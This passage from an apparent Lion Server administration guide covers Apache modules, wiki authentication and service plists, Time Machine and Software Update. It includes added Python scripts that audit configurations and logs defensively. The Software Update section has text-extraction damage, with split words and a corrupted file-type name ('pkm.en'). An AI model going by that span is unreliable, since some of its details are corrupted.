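The checker below is an added example (not from this guide) that turns the rules above into a test you can run against httpd.conf before restarting web service. It reads only uncommented LoadModule lines, which is how Lion Server disables a module. The identifier it uses for mod_userdir_apple (userdir_apple_module) is an assumption; confirm it against the LoadModule line in your own httpd.conf. The configuration text in the test is constructed.

```python
"""Added example (not from the Lion Server guide): check an httpd.conf for
the module conflicts and dependencies the guide lists, before a restart.
"""
import re

# Matches an active LoadModule line and captures the module identifier.
LOADMODULE = re.compile(r"^[ \t]*LoadModule[ \t]+(\w+)", re.MULTILINE)

# Pairs that must never both be enabled.
EXCLUSIVE = [
    ("auth_digest_module", "digest_module"),
    ("userdir_module", "userdir_apple_module"),  # second identifier is assumed
]

# module -> modules it requires.
REQUIRES = {
    "proxy_connect_module": ["proxy_module"],
    "proxy_ftp_module": ["proxy_module"],
    "proxy_http_module": ["proxy_module"],
    "proxy_ajp_module": ["proxy_module"],
    "proxy_balancer_module": ["proxy_module"],
    "encoding_module": ["headers_module", "dav_module", "dav_fs_module"],
    "mem_cache_module": ["cache_module"],
    "disk_cache_module": ["cache_module"],
}

# Pairs that must be in the same state (both on or both off).
SAME_STATE = [("dav_module", "dav_fs_module")]


def enabled_modules(config_text):
    """Return the set of module identifiers enabled by LoadModule lines.
    Commented-out lines are ignored."""
    return set(LOADMODULE.findall(config_text))


def check_modules(config_text):
    """Return human-readable violations; an empty list means consistent."""
    mods = enabled_modules(config_text)
    problems = []
    for a, b in EXCLUSIVE:
        if a in mods and b in mods:
            problems.append("%s and %s must not both be enabled" % (a, b))
    for mod, needed in REQUIRES.items():
        if mod in mods:
            for req in needed:
                if req not in mods:
                    problems.append("%s is enabled but requires %s" % (mod, req))
    for a, b in SAME_STATE:
        if (a in mods) != (b in mods):
            problems.append("%s and %s must be in the same state" % (a, b))
    return problems


def check_file(path="/etc/apache2/httpd.conf"):
    """Convenience wrapper: check a configuration file on disk."""
    with open(path) as f:
        return check_modules(f.read())
```

Run check_file() after editing httpd.conf and before a restart; every line it prints is a change that Apache would accept but that the guide says must not be made.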

User collaboration services

Web

Manage web modules

About the mod_encoding module


The open source mod_encoding module adds WebDAV support for non-ASCII file names. To support non-ASCII file names, you must enable mod_encoding and dav_module. By default, mod_encoding is disabled. The module is installed and configuration directives are present in the Apache config file. These aren't activated because the LoadModule and AddModule directives that inform Apache about mod_encoding are disabled. The Apache configuration file contains a specific set of configuration directives that should be sufficient for most needs. To modify directives you must use a text editor and edit the /etc/apache2/httpd.conf file. mod_encoding supports the following server configuration directives:

EncodingEngine directive
This directive enables and disables mod_encoding. Correct operation of mod_encoding also requires that the special version of mod_dav, mod_dav_encoding, be enabled as well.
Syntax: EncodingEngine [ on | off ]
Default: Off

AddClientEncoding directive
Although WebDAV clients are expected to send data in UTF-8 or another properly detectable encoding, some clients send data in a platform-local encoding that can't be autodetected, which is why this directive exists. It specifies the encodings expected from each client type; clients are identified by agent name. The agent name can be specified as a pattern using extended regular expressions. Never use .* for the agent name; use DefaultClientEncoding instead. This module uses Core Foundation's CFString and supports all encodings supported by it. In general, IANA-registered encoding names are supported.
Syntax: AddClientEncoding agent-name encoding [encoding...]
Default: None

DefaultClientEncoding directive
This directive sets the default encodings to expect from clients that no AddClientEncoding directive matches. You don't need to specify UTF-8 because it is the default.
Syntax: DefaultClientEncoding encoding [encoding...]
Default: UTF-8

NormalizeUsername directive
This directive was introduced to support the behavior of Windows XP when accessing a password-protected resource. Windows XP clients prepend hostname\ to the real user name. Enabling this option strips off the hostname\ part, so only the real user name is passed to the authentication module.
Syntax: NormalizeUsername [ on | off ]
Default: Off

User collaboration services

Web

Manage web modules

About Macintosh-specific web modules


By default, web service includes several Macintosh-specific web modules.

mod_auth_apple: Provides basic authentication. It is based on Apache's mod_auth_basic but is modified to use Open Directory rather than htaccess files.
mod_hfs_apple: Requires users to enter URLs for Mac OS Extended volumes using the correct case (lowercase or uppercase). This adds security for case-insensitive volumes, where a differently cased URL could otherwise reach a file that a case-sensitive Apache access control directive was meant to protect.
mod_auth_digest_apple: Provides a newer form of digest authentication when possible. It is based on Apache's mod_auth_digest but is modified to use Open Directory rather than htdigest files. It is disabled by default because it requires that the Open Directory master use Mac OS X v10.6 or later.
mod_digest_apple: Provides an older form of digest authentication. It is based on Apache's mod_digest but is modified to use Open Directory rather than htdigest files.
mod_spnego_apple: Provides Kerberos authentication for Open Directory users using the SPNEGO/Negotiate protocol.
mod_encoding: Allows WebDAV files to include Japanese characters in their names. Apple customized this open source module and modified the WebDAV module mod_dav.
mod_bonjour: Allows administrators to control how websites are registered with multicast DNS.

User collaboration services

Web

Manage web modules

About open source component modules


In addition to the large set of plugin modules distributed with the Apache web server, and the custom plugin modules developed by Apple, web service includes the following open source plugin modules.

mod_jk: Allows proxied access to Java Servlets and JavaServer Pages through the web server. This module is disabled by default.
php5_module, also known as libphp5.so: Enables PHP Hypertext Preprocessor (PHP). You can use PHP to deliver dynamic web content by using a server-side, HTML-embedded scripting language resembling C. Like the other two language modules (mod_python and mod_perl), this module allows scripts to run in Apache's address space, which is much faster than running them separately as CGIs. This module is disabled by default but is enabled when you enable Webmail in the Server app. For more information about this module, see www.php.net/.
mod_perl: Integrates the Perl interpreter into the web server, letting existing Perl CGI scripts run without modification. This integration means that the scripts run faster and consume fewer system resources. This module is disabled by default. For more information about this module, see perl.apache.org/.
mod_encoding: Adds WebDAV support for non-ASCII file names. This module is disabled by default. For more information about mod_encoding, see About the mod_encoding module.
mod_xsendfile: A small Apache2 module that processes X-SENDFILE headers set by the original output handler. If it encounters such a header, it discards all output and sends the file specified by that header instead, using Apache internals and including all optimizations like caching headers and sendfile or mmap if configured. It is useful for serving files from the output of PHP, Perl, or other CGI programs. Because the header names a path on the server, scripts must never build it from unvalidated user input, or a client can read any file the web server can. This module is disabled by default, but is enabled when Wiki starts. For additional information about mod_xsendfile, download a version and read the documentation provided in the source distribution from tn123.org/mod_xsendfile/.
mod_python: Allows you to write web-based applications in Python that run much faster than traditional CGI scripts. It also provides the ability to retain database connections and other data between hits, and access to Apache internals. For additional information about mod_python, download a version and read the documentation provided in the source distribution from www.modpython.org/.

User collaboration services

Wiki

About wiki service


Wiki service lets you host content-rich websites that users can easily edit in their web browsers. Wiki service is a standalone service that doesn't require web service. Wiki service hosts web clients for Podcast service: turn on Podcast service, and wiki service turns on a web client for it. When users connect to the wiki server, they can create wikis, which can include user-created pages, uploaded files, a blog, and a calendar. All users have personal websites called My Page, which they can use to create pages and blog posts, and upload files. Users set access permissions for their own wikis, and for their pages and files in My Page. Users can give access privileges to other users and groups on your network server or other connected network servers. In the Server app, you can choose which users are allowed to create wikis. For information about working with wikis, pages, files, and calendars, see Wiki Help. To access Wiki Help from any wiki page, choose Help from the Action pop-up menu.
RELATED TOPICS

Host wikis on your server
Choose group services

User collaboration services

Wiki

Share information using wikis


When you turn on wiki service, you can use wikis to easily share information with your friends, family, and coworkers. A wiki is a collection of pages and files that a group of people can view and add to. Traditional websites have webmasters and content producers who create content for others to view. When you create a wiki, you choose who can create and edit content. You can use wikis as an intranet for your organization or team, an information hub for a community group, or as a place to share information with your family and friends. Wikis can be viewed in any web browser, and on iOS devices such as iPad, iPhone, and iPod touch. You can create and edit wiki content on your computer using any web browser that supports modern web technologies.

With a few clicks, you can create wikis, choose who can view and edit them, and create and edit wiki pages.

Configure wiki service
In the Server app, you can set up your server to host wikis.

You can allow all users in your directory and connected directories to create wikis, or you can restrict wiki creation. Users who create wikis can set access privileges, including who's allowed to own, edit, or just view their wikis.

1. In the Wiki pane of the Server app, choose an option from the "Wikis can be created by" pop-up menu. To allow all users in your local directory, on your network server, and on connected network servers to create wikis, choose "all users," click the On/Off switch next to Wiki to turn on the service, and you're done. To restrict who can create wikis, choose "only some users," and continue following this task.
2. If you chose "only some users," use the dialog to give or remove access for users and groups.

To do this                            Do this
Give access to a user or group        Click the Add button. Enter the name of a user or group in the new entry that appears. As you type, the Server app searches for a matching user or group. If the user or group you want to give access to appears, select the name from the list.
Remove access from a user or group    Select a user or group and click the Remove button.

3. Click OK.
4. If wiki service isn't turned on, click the On/Off switch next to Wiki to turn on the service.

Create a wiki
1. If you're not logged in to the wiki server, click the Log In button, enter your user name and password, and then click Log In.
2. Click the Create pop-up menu and choose New Wiki.
3. In the "Create a new wiki" dialog, enter a name for the wiki and a description. You can later change the name of the wiki. The description is shown when users click the Info button next to the wiki's name in the Wikis page.
4. Click Upload Image, and then select an image that represents the wiki. The icon is shown next to the wiki name, and in the Wikis page. The image you upload is resized and stretched. Choose a 48 by 48 pixel image if you don't want the image to change.
5. Click Next.
6. In the "Set wiki access" dialog, give people or groups access to the wiki by entering their names in the field above the list of users and groups. As you type, the wiki server searches for matching names. Click a name to add it to the access list.
7. Use the pop-up menus to change the access permissions associated with each person or group. Here are the options you can choose:

Option          Description
Owner           Can change wiki settings, and read and write content.
Read & write    Can read and write content.
Read            Can read content.
No access       Can't read or write content. By default, anyone not in the access list has no access.

8. Click Create.

Create a wiki page
1. While viewing a wiki, click the Create pop-up menu, and then choose "New Page in 'wiki name.'" If "New Page in 'wiki name'" doesn't appear, you don't have permission to create pages in the wiki you're viewing. If you're viewing one of your My Page pages, instead of "New Page in 'wiki name'," a "New Page in My Documents" link appears. Click this link to create a standalone document.
2. Enter the name of the page, and then click Add.

Edit a wiki page
1. If you're not logged in to the wiki server, click the Log In button, enter your user name and password, and then click Log In.
2. If you're viewing a blog and not a single blog post, click the title of a blog post to view it. You can't edit a blog post while viewing the entire blog.
3. While viewing the wiki page or blog post you want to edit, click the Edit button in the navigation toolbar. If you don't have permission to edit the wiki page or blog post, the Edit button is deactivated. After you click the Edit button, the editing toolbar replaces the navigation toolbar.
4. To change the page's title, click the page's title and edit it.
5. Enter text in the body of the wiki page or blog post, and use the editing toolbar. The editing toolbar includes the following:
The editing toolbar buttons (icons are not reproduced here) do the following:
Insert a file.
Insert a picture.
Insert a movie or audio file.
Insert a table.
Insert a block of HTML, in which you can embed elements of other sites, like YouTube.
Change the paragraph style for the paragraph the pointer is in.
Change the text style for the selected text.
Insert a link to another wiki page or blog post, or to another website.
Change alignment for the selected paragraphs to left, center, right, or justified.
Change whether selected paragraphs are a bulleted or numbered list.
Indent or outdent the selected paragraph or list item.
Cancel all editing changes.
Save all editing changes.

6. When you finish editing the page, click the Save button.

User collaboration services

Wiki

Host wikis on your server


In the Server app, you can set up your server to host wikis.

You can allow all users in your directory and connected directories to create wikis, or you can restrict wiki creation. Users who create wikis can set access privileges, including who's allowed to own, edit, or view their wikis. They can grant access privileges to users in your local directory, on your network server, and on connected network servers.

1. In the Wiki pane of the Server app, choose an option from the "Wikis can be created by" pop-up menu. To allow all users in your local directory, on your network server, and on connected network servers to create wikis, choose "all users," click the On/Off switch next to Wiki to turn on the service, and you're done. To restrict who can create wikis, choose "only some users," and continue following this task.
2. If you chose "only some users," use the dialog to give or remove access for users and groups.

To do this                            Do this
Give access to a user or group        Click the Add button. Enter the name of a user or group in the new entry that appears. As you type, the Server app searches for a matching user or group. If the user or group you want to give access to appears, select the name from the list.
Remove access from a user or group    Select a user or group and click the Remove button.

3. Click OK.
4. If wiki service isn't turned on, click the On/Off switch next to Wiki to turn on the service.

RELATED TOPICS

About wiki service
Choose group services

User collaboration services

Wiki

Configure wiki authentication settings


You can change wiki authentication settings such as the redirect path, security requirements, login expiration, and the type of authentication used. You change them by editing /etc/collabd/webauthd.plist.

Redirect path
When a user tries to view a wiki page with restricted access and hasn't logged in yet, the page loads after the user logs in. If the user goes directly to http://wikiserverurl/auth, the user is asked to log in and, after logging in, is redirected to the path you set. Change the redirect path by editing this key:

Key: default_redirect_url_path
Default: /wiki
Description: Change /wiki to the location under http://wikiserverurl/ you want to send users to.

Security requirements
Wiki service includes several security options, which you turn on by adding them to the security_requires list:

Key: security_requires
Default: same_host, web_scheme, whitelist_only
Description: The list can contain these options: logout_requires_token, same_host, web_scheme, whitelist_only

Option: logout_requires_token
Description: To log out, the wiki must provide a logout_token whose value is a hash of the user's unique identifier with a shared secret. Without it, any page a user visits can log the user out by pointing the browser at the logout URL.

Option: same_host
Description: Requires that the redirect goes to the same host that the login or logout request came from.

Option: web_scheme
Description: Requires that the redirect can only go to an http:// or https:// URL.

Option: whitelist_only
Description: Requires that the redirect can only go to one of the top-level URLs listed in /etc/collabd/redirect_whitelist.plist.

The three options in the default list constrain where the login page may send a browser after authentication. Remove them and the login URL becomes an open redirect that a phishing link can use to bounce users through your server to any site.

Login expiration
Several settings control how long users stay logged in before being logged out. When users log in, they're presented with a Remember Me checkbox, which when selected keeps them logged in for a customizable period of time. If users clear the browser's cookies, their login timers are reset. Change login expiration settings by editing these keys:

Key: loginExpirySeconds
Default: 1209600
Description: How long a user stays logged in if the user selects the Remember Me checkbox. The default is 2 weeks (entered in seconds).

Key: forgetMeExpirySeconds
Default: 86399
Description: How long a user stays logged in if the user doesn't select the Remember Me checkbox. The default is one second short of 24 hours (entered in seconds).

Key: enableRememberMe
Default: true
Description: Set this to true to enable the Remember Me checkbox. Set this to false to disable the Remember Me checkbox, so every login expires after forgetMeExpirySeconds.

Key: rememberOnByDefault
Default: true
Description: Set this to true to select the Remember Me checkbox by default. Set this to false to deselect the Remember Me checkbox by default, so users get the long session only when they ask for it.

Authentication
You can choose what kind of authentication is used by editing this key:

Key: authenticator
Default: digest
Description: Set this to digest or plaintext. Digest authentication is more secure than plaintext authentication because the password itself is never sent over the connection; if you must use plaintext, serve the wiki only over HTTPS.

User collaboration services

Wiki

Configure wiki service settings


You can change wiki service settings by editing plist files. You can change the following settings by editing /etc/collabd/collabcored.plist:

Key: collabd_url
Default: http://localhost:4444/
Description: Set this to the server running collabd.

Key: webauth_url
Default: http://localhost:8086/auth
Description: Set this to the server running webauth.

Key: use_inline_webauth
Default: true
Description: Set this to true to use an inline dialog for authentication. Set this to false to redirect the browser to the webauth URL.

Key: use_sandbox_server
Default: true
Description: Set this to true to serve uploaded files through the sandbox server. Set this to false to bypass the sandbox server. Setting this to false is a security risk: uploaded files are no longer isolated from the wiki's own origin, so an uploaded HTML file containing script could run in the context of the wiki and its session cookies (cross-site scripting).

Key: sandbox_path
Default: /cc-sandbox
Description: Set this to the location of sandbox downloads.

Key: quicklook_conf_path
Default: /etc/collabd/quicklook.plist
Description: This plist file lists all the file extensions that users can use the Quick Look feature on.

Key: disable_people_view
Default: false
Description: Set this to true to disable the People page in the wiki. Set this to false to enable the People page in the wiki.

Key: disable_projects_view
Default: false
Description: Set this to true to disable the Wikis page in the wiki. Set this to false to enable the Wikis page in the wiki.

Key: max_attachment_file_size
Default: 524288000
Description: Set this to the number of bytes allowed for uploaded files and media. The default is 500 MB (in bytes).

You can change the following settings by editing /etc/collabd/collabd.plist:

Key: LogFilePath
Default: /var/log/collabd/collabd.log
Description: Set this to where collabd writes its log.

Key: LogLevel
Default: warning
Description: Set this to the level of items being logged: emergency, alert, critical, error, warning, notice, info, or debug. Setting this to debug provides the most information, but it can use a lot of hard disk space.

Key: FileDataPath
Default: /Library/Server/Wiki/FileData
Description: Set this to where uploaded files are stored. This path must be readable and writable by the _teamsserver user and readable by the _www user. Don't grant wider access than that; the folder holds user-controlled content.

Key: FiltersEnabled
Default: true
Description: Set this to true to filter potentially malicious HTML out of wiki pages. Set this to false to allow all HTML. Allowing all HTML is a large security risk: any user who can edit a page can then run script in the browser of everyone who views it.

Key: AutolinkEnabled
Default: true
Description: Set this to true to link URLs in wiki pages automatically. Set this to false to disable automatic linking.
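The Python below is an added example (not from this guide or from Lion Server) that audits the settings described in this topic and in the preceding one, "Configure wiki authentication settings": it reads /etc/collabd/webauthd.plist, collabcored.plist, and collabd.plist, reports every value that is weaker than the documented default, and produces hardened copies. The key names, defaults, and paths are the ones documented above; the plist contents used in the test are constructed, and turning rememberOnByDefault off in the hardened copy is a stricter choice than the shipped default.

```python
"""Added example (not from the Lion Server guide): audit the wiki plists for
settings that weaken security and produce hardened copies of them.
"""
import plistlib

WEBAUTHD = "/etc/collabd/webauthd.plist"
COLLABCORED = "/etc/collabd/collabcored.plist"
COLLABD = "/etc/collabd/collabd.plist"

# Every redirect/logout protection webauthd supports.
ALL_SECURITY_OPTIONS = ("logout_requires_token", "same_host", "web_scheme", "whitelist_only")
TWO_WEEKS = 1209600   # documented loginExpirySeconds default
ONE_DAY = 86400       # documented forgetMeExpirySeconds default is ONE_DAY - 1


def audit_webauthd(conf):
    """Return findings for a parsed webauthd.plist dictionary."""
    findings = []
    present = set(conf.get("security_requires", []))
    for opt in ALL_SECURITY_OPTIONS:
        if opt not in present:
            findings.append("security_requires is missing %s" % opt)
    if conf.get("authenticator", "digest") != "digest":
        findings.append("authenticator is %r; digest keeps passwords off the wire"
                        % conf.get("authenticator"))
    if conf.get("loginExpirySeconds", TWO_WEEKS) > TWO_WEEKS:
        findings.append("loginExpirySeconds exceeds the 2 week default")
    if conf.get("forgetMeExpirySeconds", ONE_DAY - 1) >= ONE_DAY:
        findings.append("forgetMeExpirySeconds exceeds one day")
    return findings


def audit_collabd(core_conf, collabd_conf):
    """Return findings for parsed collabcored.plist and collabd.plist dicts."""
    findings = []
    if not core_conf.get("use_sandbox_server", True):
        findings.append("use_sandbox_server is false: uploads are served from the wiki origin (XSS risk)")
    if not collabd_conf.get("FiltersEnabled", True):
        findings.append("FiltersEnabled is false: arbitrary HTML is allowed in pages")
    if collabd_conf.get("LogLevel", "warning") == "debug":
        findings.append("LogLevel debug can fill the disk on a busy server")
    return findings


def hardened(conf, core_conf, collabd_conf):
    """Return copies of the three dictionaries with the audited settings corrected.
    LogLevel is left alone: it is an operational choice, not a security one."""
    w = dict(conf)
    w["security_requires"] = list(ALL_SECURITY_OPTIONS)
    w["authenticator"] = "digest"
    w["loginExpirySeconds"] = min(int(w.get("loginExpirySeconds", TWO_WEEKS)), TWO_WEEKS)
    w["forgetMeExpirySeconds"] = min(int(w.get("forgetMeExpirySeconds", ONE_DAY - 1)), ONE_DAY - 1)
    w["rememberOnByDefault"] = False  # stricter than the shipped default
    c = dict(core_conf)
    c["use_sandbox_server"] = True
    d = dict(collabd_conf)
    d["FiltersEnabled"] = True
    return w, c, d


def audit_files(webauthd=WEBAUTHD, core=COLLABCORED, collabd=COLLABD):
    """Load the three plists from disk and return every finding."""
    with open(webauthd, "rb") as f:
        w = plistlib.load(f)
    with open(core, "rb") as f:
        c = plistlib.load(f)
    with open(collabd, "rb") as f:
        d = plistlib.load(f)
    return audit_webauthd(w) + audit_collabd(c, d)
```

Write the hardened dictionaries back with plistlib.dump only after reviewing the findings, and keep a copy of the originals: wiki service reads these files at startup, so the change takes effect on the next restart.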

Hardware administrative services

Time Machine service

Provide a Time Machine destination


Time Machine service offers a backup destination on your server to Time Machine users. Use the Time Machine pane of the Server app to make server disk space available for backing up users' computers, or to change the disk used for storing user backups. Time Machine service is available to users with Mac OS X Lion, Snow Leopard, and Leopard. Mac OS X Lion and Snow Leopard users who haven't selected a backup disk in the Time Machine pane of System Preferences are automatically asked whether they want to use the server as a storage location. Other users need to open the Time Machine pane of System Preferences and change the backup disk.

1. In the Server app sidebar, select Time Machine.
2. Click the On/Off switch to turn on Time Machine service.
3. Select a disk to use as the destination for users' backups, and then click Use for Backup. Time Machine service creates the Backups shared folder on the disk you select.
4. To choose a different disk as the backup destination, click Edit.

If you turn on Time Machine service when file sharing service is off, file sharing service turns on automatically. If you change the backup disk, users' Time Machine preferences that were set to use the server for backup storage will automatically begin using the Backups folder in its new location. After selecting a different backup disk, advise users that their first backup will take longer because it's a full backup. Time Machine service doesn't copy users' backup data from the old Backups folder to the new Backups folder; the old folder, with every user's data, stays on the old disk until you remove it, so keep that disk as well protected as the new one. You can control each user's access to the server's Time Machine backup storage in the Users pane of the Server app.
RELATED TOPIC

Control a user's access to services

Hardware administrative services

Time Machine service

If the server runs out of space for backing up users' Macs


If the server runs out of space for backing up users' Macs, you can connect another disk to the server and make it the storage location in the Time Machine pane of the Server app. Users whose Time Machine preferences were set to use the server for backup storage will automatically begin using the server's new backup disk. After selecting a different backup disk, you should advise users that their first backup will take longer because it's a full backup. Time Machine service doesn't copy users' backup data from the old backup disk to the new backup disk.
RELATED TOPIC

Provide a Time Machine destination

Hardware administrative services

Software Update

Software Update
Software Update offers you ways to manage Macintosh software updates from Apple on your network. In an uncontrolled environment, users might connect to Apple Software Update servers at any time and update their computers with software that is not approved by your IT group. Using local Software Update servers, your client computers access only the s oftware updates you permit from s oftware lists that you control, improving your ability to manage computer s oftware updates . For example you can: Download software updates from Apple Software Update servers to a local server for s haring with local network clients and reduce the amount of bandwidth used outside your network. Direct us ers, groups, and computers to specific local Software Update s ervers using managed preferences. Manage the software update packages users can access by enabling and dis abling packages at the local server. Mirror updates between Apple Software Update servers and your server to make sure you have the most current updates. Note: Software Update does not update s oftware on the server. For information about keeping your server software current, see Server Admin Help. Note: You cant us e Software Update to provide third-party s oftware updates . The process that starts Software Update is swupd_syncd. When you s tart Software Update, it contacts Apples Software Update server and reques ts a list of available software to download locally. You can copy (store packages locally) and enab le (make the packages available to users) any files in the lis t. You can also limit user bandwidth for updates and choose to automatically copy and enable newer updates from the Apple server. Note: Software Update stores its configuration information in the /etc/swupd/s wupd.conf file. Catalogs When Software Update starts, your Software Update server receives a list of available software updates from the Apple Software Update s ervice. 
Your server synchronizes the contents of the software catalog with Apples Software Update server when you restart your s erver or when you enter the following command:

$ sudo -u _softwareupdate /usr/sbin/swupd_syncd -sync WARNING: It is not recommended to refresh the service using the swupd_syncd daemon directly. Doing so can change the file permissions of downloaded updates, making future sync operations fail. If you must sync us ing swupd_syncd directly, use the -u option with the _softwareupdate user name to prevent the changing of file permiss ions. To manually update the catalog, select the Refresh button in the Updates pane of Software Update settings. Changes in the Apple published catalog are immediately reflected on your local s erver. Deprecated s oftware packages are disabled when a replacement package for that update is enabled. An adminis trator can disable the new software package and continue offering the deprecated package. Installation packages Software Update supports pkm.en and .tar file types, recognized only by Mac OS X v10.4 and later. As you copy updates on your server, your server downloads and s tores update packages in the /var/db/swupd/ folder. This path can be modified to store the packages in an alternate location. Note: Lion Server supports only Apple-s pecific software packages for us e with your update s erver. Modified Apple and third-party update software packages cannot be shared. After packages are copied locally, you can enable them for us ers to update their s oftware. Mac clients running Software Update see only enabled packages in the list of available software for their computer. Deprecated software packages are disabled when a replacement package for that update is enabled. An adminis trator can disable the new software package and continue offering the deprecated package. Stay up-to-date with the Apple Server To keep your s ervice synchronized with the most current information, your Software Update s erver must always remain in contact with the Apple server. 
Software Update service regularly checks with Apple Software Update to update us age information and send lists of newly available software to the updates catalog on your server as they become available. The Apple Software Update s erver executes the swupd_syncd synchronization daemon to make sure the latest update packages are available. The scheduled execution of swupd_syncd is controlled by launchd by means of the StartCalendarInterval setting at /System/Library/LaunchDaemons/com.apple.swupdate.sync.plist. Limit user bandwidth Software Update lets you limit the bandwidth that client computers can use when downloading software updates from your Software Update server. Setting a limit on the bandwidth enables you to control traffic on your network and prevents Software Update clients from slowing the network. For example, if you limit the bandwidth to 56 Kbps, each s oftware update client can download updates at 56 Kbps. If five clients connect simultaneously to the server, the total bandwidth used by the clients will be 280 Kbps (56 Kbps x 5). Limit Software Update server bandwidth A new feature in Lion Server Software Update s erver is the syncBandwidth. This feature can be used to limit the server's bandwidth back to Apple. Similar to the user bandwidth limit s etting, it's value is expres sed in KBytes/second (for example, 1024 = 1048576 Bytes/second). Setting a limit on the server's bandwidth enable you to minimize impact of the Software Update server on your organizations limited external bandwidth. Revoked files On a rare occasion Apple might provide a s oftware update and want to revoke or deprecate a package from circulation. If Apple revokes the update package, the package is removed from your catalog and stored packages , making it unavailable to clients. If Apple deprecates a software package and provides a replacement package, the older software package is dis abled, making it unavailable to clients. 
The package remains in your catalog and stored packages until you remove it. An administrator can disable the new software package and continue offering the deprecated package.

Software Update package format

You can't make your own Software Update packages. To protect against attackers forging packages, the Software Update package installer won't install a package unless it is signed by Apple.

In addition, Software Update works only with the package format supported in Mac OS X Server v10.4 or later.

Log files

The log files for Software Update are located in the /var/log/swupd/ folder and record Software Update events as they occur. The log files for Software Update include the following:

swupd_syncd_log: logs the swupd_syncd daemon
swupd_error_log: reports error messages from the httpd daemon controlled by Software Update
swupd_access_log: reports access messages from the httpd daemon controlled by Software Update

The logs can be viewed in Server Admin in the Software Update Logs panel or using the Console application located in the /Applications/Utilities/ folder.

Collected information

The Apple Software Update server collects the following information from client Software Update servers:

Language
Type
Browser
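The access log above is the one place you can see which clients are pulling catalogs and packages from your server. The following Python is an added example, not part of Apple's documentation or tooling: it assumes swupd_access_log is written by the httpd that Software Update controls in the standard Apache combined log format, parses it, and reports per-client catalog fetches, package download counts, failed requests, and any client address outside the networks you expect to serve. The log lines, addresses, product path and catalog name are constructed for the example.

```python
"""Summarize /var/log/swupd/swupd_access_log (added example, not Apple's code).

Assumes the Apache "combined" log format; the sample lines, addresses and
package path below are constructed and do not describe a real deployment.
"""
import ipaddress
import re
from collections import Counter, defaultdict

# host ident user [time] "METHOD path HTTP/x" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)'
)

# Constructed sample: two catalog fetches from campus clients, one full and one
# ranged package download, a 404 from a scanner, and a fetch from outside.
SAMPLE_LOG = """\
10.1.2.30 - - [12/Mar/2012:03:05:11 -0700] "GET /index-leopard.merged-1.sucatalog HTTP/1.1" 200 41822 "-" "Software%20Update"
10.1.2.31 - - [12/Mar/2012:03:06:02 -0700] "GET /content/downloads/041-1234/SomeUpdate.pkg HTTP/1.1" 200 93212 "-" "Software%20Update"
10.1.2.30 - - [12/Mar/2012:03:07:45 -0700] "GET /content/downloads/041-1234/SomeUpdate.pkg HTTP/1.1" 206 2048 "-" "Software%20Update"
10.1.2.44 - - [12/Mar/2012:03:08:10 -0700] "GET /index-leopard.merged-1.sucatalog HTTP/1.1" 404 312 "-" "curl/7.21"
203.0.113.9 - - [12/Mar/2012:03:09:00 -0700] "GET /index-leopard.merged-1.sucatalog HTTP/1.1" 200 41822 "-" "Software%20Update"
"""


def parse_access_log(text):
    """Return one dict per well-formed line; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["status"] = int(rec["status"])
        rec["bytes"] = 0 if rec["bytes"] == "-" else int(rec["bytes"])
        records.append(rec)
    return records


def summarize(records, trusted_networks):
    """Per-client activity plus the two things worth alerting on:
    requests from outside trusted_networks and failed (>= 400) requests."""
    nets = [ipaddress.ip_network(n) for n in trusted_networks]
    catalogs = defaultdict(set)   # client -> catalog paths fetched
    packages = Counter()          # package path -> download count (incl. ranges)
    failures = []
    outsiders = set()
    for r in records:
        try:
            addr = ipaddress.ip_address(r["host"])
            inside = any(addr in n for n in nets)
        except ValueError:        # hostname rather than address: treat as unknown
            inside = False
        if not inside:
            outsiders.add(r["host"])
        if r["status"] >= 400:
            failures.append((r["host"], r["path"], r["status"]))
            continue
        if r["path"].endswith(".sucatalog"):
            catalogs[r["host"]].add(r["path"])
        elif r["path"].endswith(".pkg"):
            packages[r["path"]] += 1
    return {
        "clients": sorted({r["host"] for r in records}),
        "catalogs": {h: sorted(c) for h, c in catalogs.items()},
        "packages": dict(packages),
        "failures": failures,
        "outsiders": sorted(outsiders),
    }


if __name__ == "__main__":
    report = summarize(parse_access_log(SAMPLE_LOG), ["10.1.0.0/16"])
    for key, value in report.items():
        print(key, value)
```

Run it against the real file with `sudo python3 swupd_log.py` after replacing SAMPLE_LOG with `open("/var/log/swupd/swupd_access_log").read()` and the trusted networks with your own ranges; the "outsiders" list is the one to act on, since the update server is not meant to be reachable beyond your intranet.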

Hardware administrative services

Software Update

Tools for managing Software Update


The Workgroup Manager and Server Admin applications provide a graphical interface for managing Software Update in Lion Server. In addition, you can manage Software Update from the command line by using Terminal.

Server Admin

Server Admin provides access to tools you use to set up, manage, and monitor Software Update and other services. You use Server Admin to:

Set up Mac OS X Server as a Software Update server. For instructions, see Configure Software Update general settings.
Manage and monitor Software Update service.

For more information about using Server Admin, see Server Admin Help:

Opening and authenticating in Server Admin
Working with specific servers
Administering services
Using SSL for remote server administration

Server Admin is installed in /Applications/Server/.

Workgroup Manager

Workgroup Manager provides comprehensive management of clients of Mac OS X Server. You use Workgroup Manager to set preferences by user, group, or computer that point clients at your Software Update server. For more information about configuring managed preferences for the Software Update server, and about using Workgroup Manager in general, see Workgroup Manager Help, which includes:

Opening and authenticating in Workgroup Manager
Administering accounts
Customizing the Workgroup Manager environment

Workgroup Manager is installed in /Applications/Server/.

Command-line tools

A full range of command-line tools is available for administrators who prefer command-driven server administration. For remote server management, submit commands in a secure shell (SSH) session. You can enter commands using the Terminal application, located in the /Applications/Utilities/ folder.

Set up Software Update

Software Update setup overview


Here is an overview of the basic steps for configuring your Software Update server: setting up Software Update service, configuring client computer access to the server, and testing.

Evaluate and update your network, servers, and client computers as necessary

The number of client computers you can support using Software Update is determined by the number of servers you have, how they're configured, hard disk storage capacity, and other factors. See Considerations and requirements. Depending on the results of this evaluation, you might want to add servers or hard disks, add Ethernet ports, or make other changes to your servers. For your client computers to use the local Software Update service, they must run Mac OS X v10.5 or later (see Considerations and requirements).

Create your Software Update service plan

Decide which users will access Software Update. You might have groups who need unlimited access while others need a more limited choice of software updates. Such a plan requires more than one Software Update server, with client computers bound to directory services so that managed preferences can point each group at the right server.

Configure the Software Update server

Decide how to copy and enable software updates from Apple: automatically or manually. Set the maximum bandwidth you want a single computer to use when downloading update packages from your server. See Configure Software Update general settings.

Start Software Update

